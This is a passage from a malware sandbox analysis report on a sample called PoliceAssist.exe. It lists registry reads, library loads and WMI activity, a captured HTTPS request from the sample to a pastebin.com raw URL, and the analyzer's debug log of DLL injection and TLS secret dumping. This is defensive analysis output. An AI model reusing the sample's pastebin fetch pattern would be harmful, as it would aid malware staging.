"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,406", "eid": 441, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl", "content": "0\\x82E\\x94\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x82E\\x850\\x82E\\x81\\x02\\x01\\x011\\x0b0\t\\x06\\x05+\\x0e\\x03\\x02\\x1a\\x05\\x000\\x82'\\xee\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x82'\\xdf0\\x82'\\xdb0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03 \\x04,P\\x00i\\x00n\\x00R\\x00u\\x00l\\x00e\\x00s\\x00_\\x00A\\x00u\\x00t\\x00o\\x00U\\x00p\\x00d\\x00a\\x00t\\x00e\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xd2\\xdae\\xad\\xdb@7\\x17\r170531232859Z\\x17\r180601232859Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\"\\x05\\x000\\x82\\x1f\\xa30)\\x04\\x12.files-df.1drv.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000&\\x04\\x0f.files.1drv.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x0004\\x04\n.aadrm.com1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x0101\\x04\\x07.afx.ms1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x0105\\x04\\x0b.akadns.net1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x010%\\x04\\x0e.aspnetcdn.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x0008\\x04\\x0e.azure-int.net1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,609", "eid": 442, "data": { "file": "C:\\Windows\\System32\\mlang.dll", "pathtofile": null, "moduleaddress": "0x7ffec5430000" } }, { "event": "findwindow", "object": "windowname", "timestamp": "2025-11-20 10:58:35,609", "eid": 443, "data": { "classname": "Shell_TrayWnd", "windowname": "" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,656", "eid": 444, "data": { "file": "comctl32.dll", "pathtofile": null, "moduleaddress": "0x7ffecf5a0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,687", "eid": 445, "data": { "file": "C:\\Windows\\System32\\msctf.dll", "pathtofile": null, "moduleaddress": "0x7ffee21a0000" } }, { "event": "execute", "object": "file", "timestamp": "2025-11-20 10:58:31,557", "eid": 446, "data": { "file": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,698", "eid": 447, "data": { "file": "C:\\Windows\\System32\\rsaenh.dll", "pathtofile": null, "moduleaddress": "0x7ffedfb90000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:31,632", "eid": 448, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x7ffee1660000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,725", "eid": 449, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemprox.dll", "pathtofile": null, "moduleaddress": "0x7ffedc850000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,741", "eid": 450, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemsvc.dll", "pathtofile": null, "moduleaddress": "0x7ffed94f0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,741", "eid": 451, "data": { "file": "C:\\Windows\\System32\\wbem\\fastprox.dll", "pathtofile": null, "moduleaddress": "0x7ffed3fc0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,757", "eid": 452, "data": { "file": "C:\\Windows\\System32\\wbem\\wmiutils.dll", "pathtofile": null, "moduleaddress": "0x7ffedc210000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,788", "eid": 453, "data": { "file": "C:\\Windows\\System32\\wbem\\cimwin32.dll", "pathtofile": null, "moduleaddress": "0x7ffec3810000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,803", "eid": 454, "data": { "file": "wldp.dll", "pathtofile": null, "moduleaddress": "0x7ffee0500000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,803", "eid": 455, "data": { "file": "wldp.dll", "pathtofile": null, "moduleaddress": "0x7ffee0500000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,819", "eid": 456, "data": { "file": "wldp.dll", "pathtofile": null, "moduleaddress": "0x7ffee0500000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,819", "eid": 457, "data": { "file": "wldp.dll", "pathtofile": null, "moduleaddress": "0x7ffee0500000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,819", "eid": 458, "data": { "file": "SECURITY.DLL", "pathtofile": null, "moduleaddress": "0x21e2c090000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,819", "eid": 459, "data": { "file": "C:\\Windows\\System32\\schannel.dll", "pathtofile": null, "moduleaddress": "0x7ffedfaa0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,835", "eid": 460, "data": { "file": "NTDLL.DLL", "pathtofile": null, "moduleaddress": "0x7ffee3470000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,866", "eid": 461, "data": { "file": "NETAPI32.DLL", "pathtofile": null, "moduleaddress": "0x7ffec3b80000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,882", "eid": 462, "data": { "file": "wkscli.dll", "pathtofile": null, "moduleaddress": "0x7ffedfcf0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,897", "eid": 463, "data": { "file": "cscapi.dll", "pathtofile": null, "moduleaddress": "0x7ffece280000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,897", "eid": 464, "data": { "file": "KERNEL32.DLL", "pathtofile": null, "moduleaddress": "0x7ffee1660000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,897", "eid": 465, "data": { "file": "OLEAUT32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2a80000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:33,741", "eid": 466, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemcore.dll", "pathtofile": null, "moduleaddress": "0x7ffed40d0000" } } ], "encryptedbuffers": [ { "process_name": "PoliceAssist.exe", "pid": 3308, "api_call": "SslEncryptPacket", "buffer": "GET /raw/04TKQkE1 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pastebin.com", "buffer_size": "158" } ] }, "debug": { "log": "2025-11-20 02:03:39,056 [root] INFO: Date set to: 20251120T13:58:15, timeout set to: 200\n2025-11-20 13:58:15,020 [root] DEBUG: Starting analyzer from: C:\\nubpj4dt\n2025-11-20 13:58:15,020 [root] DEBUG: Storing results at: C:\\PJdnys\n2025-11-20 13:58:15,021 [root] DEBUG: Pipe server name: \\\\.\\PIPE\\HvOHjQz\n2025-11-20 13:58:15,021 [root] DEBUG: Python path: C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32\n2025-11-20 13:58:15,021 [root] INFO: analysis running as an admin\n2025-11-20 13:58:15,022 [root] INFO: analysis package specified: \"exe\"\n2025-11-20 13:58:15,022 [root] DEBUG: importing analysis package module: \"modules.packages.exe\"...\n2025-11-20 13:58:15,046 [root] DEBUG: imported analysis package \"exe\"\n2025-11-20 13:58:15,047 [root] DEBUG: initializing analysis package \"exe\"...\n2025-11-20 13:58:15,047 [lib.common.common] INFO: wrapping\n2025-11-20 13:58:15,047 [lib.core.compound] INFO: C:\\Temp already exists, skipping creation\n2025-11-20 13:58:15,048 [root] DEBUG: New location of moved file: C:\\Temp\\PoliceAssist.exe\n2025-11-20 13:58:15,048 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option\n2025-11-20 13:58:15,048 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option\n2025-11-20 13:58:15,048 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option\n2025-11-20 13:58:15,048 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option\n2025-11-20 13:58:15,069 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.browser\"\n2025-11-20 13:58:15,083 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.digisig\"\n2025-11-20 13:58:15,107 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.disguise\"\n2025-11-20 13:58:15,124 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.human\"\n2025-11-20 13:58:15,131 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'\n2025-11-20 13:58:15,198 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'\n2025-11-20 13:58:15,200 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'\n2025-11-20 13:58:15,295 [lib.api.screenshot] INFO: Please upgrade Pillow to >= 5.4.1 for best performance\n2025-11-20 13:58:15,296 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.screenshots\"\n2025-11-20 13:58:15,299 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.tlsdump\"\n2025-11-20 13:58:15,300 [root] DEBUG: Initialized auxiliary module \"Browser\"\n2025-11-20 13:58:15,300 [root] DEBUG: attempting to configure 'Browser' from data\n2025-11-20 13:58:15,303 [root] DEBUG: module Browser does not support data configuration, ignoring\n2025-11-20 13:58:15,303 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.browser\"...\n2025-11-20 13:58:15,304 [root] DEBUG: Started auxiliary module modules.auxiliary.browser\n2025-11-20 13:58:15,305 [root] DEBUG: Initialized auxiliary module \"DigiSig\"\n2025-11-20 13:58:15,305 [root] DEBUG: attempting to configure 'DigiSig' from data\n2025-11-20 13:58:15,305 [root] DEBUG: module DigiSig does not support data configuration, ignoring\n2025-11-20 13:58:15,305 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.digisig\"...\n2025-11-20 13:58:15,306 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature\n2025-11-20 13:58:15,893 [modules.auxiliary.digisig] DEBUG: File is not signed\n2025-11-20 13:58:15,894 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json\n2025-11-20 13:58:15,902 [root] DEBUG: Started auxiliary module modules.auxiliary.digisig\n2025-11-20 13:58:15,902 [root] DEBUG: Initialized auxiliary module \"Disguise\"\n2025-11-20 13:58:15,902 [root] DEBUG: attempting to configure 'Disguise' from data\n2025-11-20 13:58:15,903 [root] DEBUG: module Disguise does not support data configuration, ignoring\n2025-11-20 13:58:15,903 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.disguise\"...\n2025-11-20 13:58:15,904 [modules.auxiliary.disguise] INFO: Disguising GUID to 055f5de2-8eba-4c7c-bb64-628488f2ad24\n2025-11-20 13:58:15,904 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise\n2025-11-20 13:58:15,905 [root] DEBUG: Initialized auxiliary module \"Human\"\n2025-11-20 13:58:15,905 [root] DEBUG: attempting to configure 'Human' from data\n2025-11-20 13:58:15,905 [root] DEBUG: module Human does not support data configuration, ignoring\n2025-11-20 13:58:15,906 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.human\"...\n2025-11-20 13:58:15,908 [root] DEBUG: Started auxiliary module modules.auxiliary.human\n2025-11-20 13:58:15,909 [root] DEBUG: Initialized auxiliary module \"Screenshots\"\n2025-11-20 13:58:15,909 [root] DEBUG: attempting to configure 'Screenshots' from data\n2025-11-20 13:58:15,910 [root] DEBUG: module Screenshots does not support data configuration, ignoring\n2025-11-20 13:58:15,910 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.screenshots\"...\n2025-11-20 13:58:15,911 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots\n2025-11-20 13:58:15,912 [root] DEBUG: Initialized auxiliary module \"TLSDumpMasterSecrets\"\n2025-11-20 13:58:15,912 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data\n2025-11-20 13:58:15,913 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring\n2025-11-20 13:58:15,914 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.tlsdump\"...\n2025-11-20 13:58:15,918 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 608\n2025-11-20 13:58:16,105 [lib.api.process] INFO: Monitor config for : C:\\nubpj4dt\\dll\\608.ini\n2025-11-20 13:58:16,108 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:16,108 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor\n2025-11-20 13:58:16,117 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:16,156 [root] DEBUG: Loader: Injecting process 608 with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:16,178 [root] DEBUG: 608: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:16,179 [root] DEBUG: 608: Disabling sleep skipping.\n2025-11-20 13:58:16,180 [root] DEBUG: 608: Interactive desktop enabled.\n2025-11-20 13:58:16,181 [root] DEBUG: 608: TLS secret dump mode enabled.\n2025-11-20 13:58:16,215 [root] DEBUG: 608: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 0x00007FFEE35DD4F0\n2025-11-20 13:58:16,216 [root] DEBUG: 608: Monitor initialised: 64-bit capemon loaded in process 608 at 0x00007FFEB75E0000, thread 404, image base 0x00007FF60EE30000, stack from 0x000000A5F48F3000-0x000000A5F4900000\n2025-11-20 13:58:16,217 [root] DEBUG: 608: Commandline: C:\\Windows\\system32\\lsass.exe\n2025-11-20 13:58:16,229 [root] DEBUG: 608: Hooked 5 out of 5 functions\n2025-11-20 13:58:16,231 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-11-20 13:58:16,232 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:16,235 [lib.api.process] INFO: Injected into 64-bit \n2025-11-20 13:58:16,235 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump\n2025-11-20 13:58:16,235 [root] INFO: Interactive mode enabled - injecting into explorer shell\n2025-11-20 13:58:16,236 [lib.api.process] INFO: Monitor config for : C:\\nubpj4dt\\dll\\2552.ini\n2025-11-20 13:58:16,238 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:16,241 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:16,253 [root] DEBUG: Loader: Injecting process 2552 with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:16,259 [root] DEBUG: 2552: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:16,261 [root] DEBUG: 2552: Disabling sleep skipping.\n2025-11-20 13:58:16,261 [root] DEBUG: 2552: Interactive desktop enabled.\n2025-11-20 13:58:16,262 [root] DEBUG: 2552: Dropped file limit defaulting to 100.\n2025-11-20 13:58:16,264 [root] DEBUG: 2552: Interactive desktop - injecting Explorer Shell\n2025-11-20 13:58:16,280 [root] DEBUG: 2552: YaraInit: Compiled 43 rule files\n2025-11-20 13:58:16,283 [root] DEBUG: 2552: YaraInit: Compiled rules saved to file C:\\nubpj4dt\\data\\yara\\capemon.yac\n2025-11-20 13:58:16,311 [root] DEBUG: 2552: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 0x00007FFEE35DD4F0\n2025-11-20 13:58:16,313 [root] DEBUG: 2552: YaraScan: Scanning 0x00007FF735FF0000, size 0x545316\n2025-11-20 13:58:16,416 [root] DEBUG: 608: DLL loaded at 0x00007FFEE1420000: C:\\Windows\\System32\\cfgmgr32 (0x4e000 bytes).\n2025-11-20 13:58:16,417 [root] DEBUG: 608: DLL loaded at 0x00007FFEE0870000: C:\\Windows\\system32\\DEVOBJ (0x33000 bytes).\n2025-11-20 13:58:16,418 [root] DEBUG: 608: DLL loaded at 0x00007FFEC25B0000: C:\\Windows\\System32\\ngcpopkeysrv (0x48000 bytes).\n2025-11-20 13:58:16,431 [root] DEBUG: 2552: Monitor initialised: 64-bit capemon loaded in process 2552 at 0x00007FFEB75E0000, thread 476, image base 0x00007FF735FF0000, stack from 0x0000000002A62000-0x0000000002A70000\n2025-11-20 13:58:16,433 [root] DEBUG: 608: DLL loaded at 0x00007FFEB7290000: C:\\Windows\\system32\\PCPKsp (0x118000 bytes).\n2025-11-20 13:58:16,434 [root] DEBUG: 2552: Commandline: C:\\Windows\\Explorer.EXE\n2025-11-20 13:58:16,440 [root] DEBUG: 608: DLL loaded at 0x00007FFEE2C00000: C:\\Windows\\System32\\imagehlp (0x1d000 bytes).\n2025-11-20 13:58:16,442 [root] DEBUG: 608: DLL loaded at 0x00007FFED4740000: C:\\Windows\\system32\\tbs (0x1b000 bytes).\n2025-11-20 13:58:16,454 [root] DEBUG: 2552: Hooked 69 out of 69 functions\n2025-11-20 13:58:16,517 [root] DEBUG: 2552: Syscall hook installed, syscall logging level 1\n2025-11-20 13:58:16,534 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-11-20 13:58:16,536 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:16,540 [lib.api.process] INFO: Injected into 64-bit \n2025-11-20 13:58:16,625 [root] DEBUG: 608: TLS 1.2 secrets logged to: C:\\PJdnys\\tlsdump\\tlsdump.log\n2025-11-20 13:58:21,604 [root] INFO: Restarting WMI Service\n2025-11-20 13:58:23,747 [root] DEBUG: package modules.packages.exe does not support configure, ignoring\n2025-11-20 13:58:23,748 [root] WARNING: configuration error for package modules.packages.exe: error importing data.packages.exe: No module named 'data.packages'\n2025-11-20 13:58:23,748 [lib.core.compound] INFO: C:\\Temp already exists, skipping creation\n2025-11-20 13:58:23,771 [lib.api.process] INFO: Successfully executed process from path \"C:\\Temp\\PoliceAssist.exe\" with arguments \"\" with pid 3308\n2025-11-20 13:58:23,772 [lib.api.process] INFO: Monitor config for : C:\\nubpj4dt\\dll\\3308.ini\n2025-11-20 13:58:23,775 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:23,778 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:23,789 [root] DEBUG: Loader: Injecting process 3308 (thread 2188) with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:23,790 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-11-20 13:58:23,791 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:23,793 [lib.api.process] INFO: Injected into 64-bit \n2025-11-20 13:58:25,797 [lib.api.process] INFO: Successfully resumed \n2025-11-20 13:58:25,811 [root] DEBUG: 3308: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:25,812 [root] DEBUG: 3308: Disabling sleep skipping.\n2025-11-20 13:58:25,813 [root] DEBUG: 3308: Interactive desktop enabled.\n2025-11-20 13:58:25,814 [root] DEBUG: 3308: Dropped file limit defaulting to 100.\n2025-11-20 13:58:25,818 [root] DEBUG: 3308: YaraInit: Compiled rules loaded from existing file C:\\nubpj4dt\\data\\yara\\capemon.yac\n2025-11-20 13:58:25,843 [root] DEBUG: 3308: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 0x00007FFEE35DD4F0\n2025-11-20 13:58:25,844 [root] DEBUG: 3308: YaraScan: Scanning 0x0000000140000000, size 0x126a57\n2025-11-20 13:58:25,894 [root] DEBUG: 3308: Monitor initialised: 64-bit capemon loaded in process 3308 at 0x00007FFEB75E0000, thread 2188, image base 0x0000000140000000, stack from 0x00000000007F5000-0x0000000000800000\n2025-11-20 13:58:25,895 [root] DEBUG: 3308: Commandline: \"C:\\Temp\\PoliceAssist.exe\"\n2025-11-20 13:58:25,918 [root] DEBUG: 3308: hook_api: LdrpCallInitRoutine export address 0x00007FFEE34899BC obtained via GetFunctionAddress\n2025-11-20 13:58:25,973 [root] WARNING: b'Unable to place hook on LockResource'\n2025-11-20 13:58:25,974 [root] DEBUG: 3308: set_hooks: Unable to hook LockResource\n2025-11-20 13:58:25,985 [root] DEBUG: 3308: Hooked 619 out of 620 functions\n2025-11-20 13:58:26,001 [root] DEBUG: 3308: Syscall hook installed, syscall logging level 1\n2025-11-20 13:58:26,008 [root] DEBUG: 3308: RestoreHeaders: Restored original import table.\n2025-11-20 13:58:26,009 [root] INFO: Loaded monitor into process with pid 3308\n2025-11-20 13:58:26,025 [root] DEBUG: 3308: caller_dispatch: Added region at 0x0000000140000000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00000001400D415D, thread 2188).\n2025-11-20 13:58:26,026 [root] DEBUG: 3308: YaraScan: Scanning 0x0000000140000000, size 0x126a57\n2025-11-20 13:58:26,044 [root] DEBUG: 3308: ProcessImageBase: Main module image at 0x0000000140000000 unmodified (entropy change 0.000000e+00)\n2025-11-20 13:58:26,049 [root] DEBUG: 3308: set_hooks_by_export_directory: Hooked 0 out of 620 functions\n2025-11-20 13:58:26,049 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDEA70000: C:\\Windows\\SYSTEM32\\kernel.appcore (0x12000 bytes).\n2025-11-20 13:58:26,051 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE1390000: C:\\Windows\\System32\\bcryptPrimitives (0x82000 bytes).\n2025-11-20 13:58:26,055 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDE5B0000: C:\\Windows\\system32\\uxtheme (0x9e000 bytes).\n2025-11-20 13:58:26,070 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE21A0000: C:\\Windows\\System32\\MSCTF (0x114000 bytes).\n2025-11-20 13:58:26,105 [root] DEBUG: 3308: DLL loaded at 0x00007FFED6980000: C:\\Windows\\SYSTEM32\\TextShaping (0xac000 bytes).\n2025-11-20 13:58:26,147 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE0500000: C:\\Windows\\SYSTEM32\\Wldp (0x2d000 bytes).\n2025-11-20 13:58:26,147 [root] DEBUG: 2552: YaraScan: Scanning 0x00007FF735FF0000, size 0x545316\n2025-11-20 13:58:26,148 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDEC70000: C:\\Windows\\SYSTEM32\\windows.storage (0x79b000 bytes).\n2025-11-20 13:58:26,153 [root] DEBUG: 2552: caller_dispatch: Added region at 0x00007FF735FF0000 to tracked regions list (combase::CoCreateInstance returns to 0x00007FF736098FBA, thread 2996).\n2025-11-20 13:58:26,154 [root] DEBUG: 2552: YaraScan: Scanning 0x00007FF735FF0000, size 0x545316\n2025-11-20 13:58:26,217 [root] DEBUG: 2552: ProcessImageBase: Main module image at 0x00007FF735FF0000 unmodified (entropy change 0.000000e+00)\n2025-11-20 13:58:26,227 [root] DEBUG: 2552: ProcessImageBase: Main module image at 0x00007FF735FF0000 unmodified (entropy change 0.000000e+00)\n2025-11-20 13:58:26,304 [lib.api.process] INFO: Monitor config for : C:\\nubpj4dt\\dll\\740.ini\n2025-11-20 13:58:26,306 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:26,308 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:26,318 [root] DEBUG: Loader: Injecting process 740 with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:26,322 [root] DEBUG: 740: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:26,323 [root] DEBUG: 740: Disabling sleep skipping.\n2025-11-20 13:58:26,324 [root] DEBUG: 740: Interactive desktop enabled.\n2025-11-20 13:58:26,325 [root] DEBUG: 740: Dropped file limit defaulting to 100.\n2025-11-20 13:58:26,327 [root] DEBUG: 740: Services hook set enabled\n2025-11-20 13:58:26,331 [root] DEBUG: 740: YaraInit: Compiled rules loaded from existing file C:\\nubpj4dt\\data\\yara\\capemon.yac\n2025-11-20 13:58:26,355 [root] DEBUG: 740: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 0x00007FFEE35DD4F0\n2025-11-20 13:58:26,356 [root] DEBUG: 740: Monitor initialised: 64-bit capemon loaded in process 740 at 0x00007FFEB75E0000, thread 3172, image base 0x00007FF630560000, stack from 0x000000A00B876000-0x000000A00B880000\n2025-11-20 13:58:26,356 [root] DEBUG: 740: Commandline: C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p\n2025-11-20 13:58:26,371 [root] DEBUG: 740: Hooked 69 out of 69 functions\n2025-11-20 13:58:26,373 [root] INFO: Loaded monitor into process with pid 740\n2025-11-20 13:58:26,374 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-11-20 13:58:26,375 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:26,378 [lib.api.process] INFO: Injected into 64-bit \n2025-11-20 13:58:29,453 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE2C20000: C:\\Windows\\System32\\clbcatq (0xa9000 bytes).\n2025-11-20 13:58:29,473 [root] DEBUG: 3308: DLL loaded at 0x00007FFED95E0000: C:\\Windows\\SYSTEM32\\wbemcomn (0x90000 bytes).\n2025-11-20 13:58:29,473 [root] DEBUG: 3308: DLL loaded at 0x00007FFED9590000: C:\\Windows\\system32\\wbem\\wbemdisp (0x4e000 bytes).\n2025-11-20 13:58:29,485 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDC850000: C:\\Windows\\system32\\wbem\\wbemprox (0x11000 bytes).\n2025-11-20 13:58:29,493 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDC210000: C:\\Windows\\system32\\wbem\\wmiutils (0x28000 bytes).\n2025-11-20 13:58:29,536 [root] DEBUG: 3308: DLL loaded at 0x00007FFED94F0000: C:\\Windows\\system32\\wbem\\wbemsvc (0x14000 bytes).\n2025-11-20 13:58:29,630 [root] DEBUG: 3308: hook_api: WMI_ExecQuery export address 0x00007FFED3FCD630 obtained via GetFunctionAddress\n2025-11-20 13:58:29,651 [root] DEBUG: 3308: hook_api: WMI_ExecMethod export address 0x00007FFED40630C0 obtained via GetFunctionAddress\n2025-11-20 13:58:29,727 [root] DEBUG: 3308: DLL loaded at 0x00007FFED3FC0000: C:\\Windows\\system32\\wbem\\fastprox (0x10b000 bytes).\n2025-11-20 13:58:29,730 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDE1C0000: C:\\Windows\\SYSTEM32\\amsi (0x1f000 bytes).\n2025-11-20 13:58:29,741 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE08C0000: C:\\Windows\\SYSTEM32\\sxs (0xa2000 bytes).\n2025-11-20 13:58:29,802 [root] DEBUG: 740: CreateProcessHandler: Injection info set for new process 3164: C:\\Windows\\system32\\wbem\\wmiprvse.exe, ImageBase: 0x00007FF79AAF0000\n2025-11-20 13:58:29,803 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 3164\n2025-11-20 13:58:29,804 [lib.api.process] INFO: Monitor config for : C:\\nubpj4dt\\dll\\3164.ini\n2025-11-20 13:58:29,806 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:30,966 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:30,977 [root] DEBUG: Loader: Injecting process 3164 (thread 1388) with 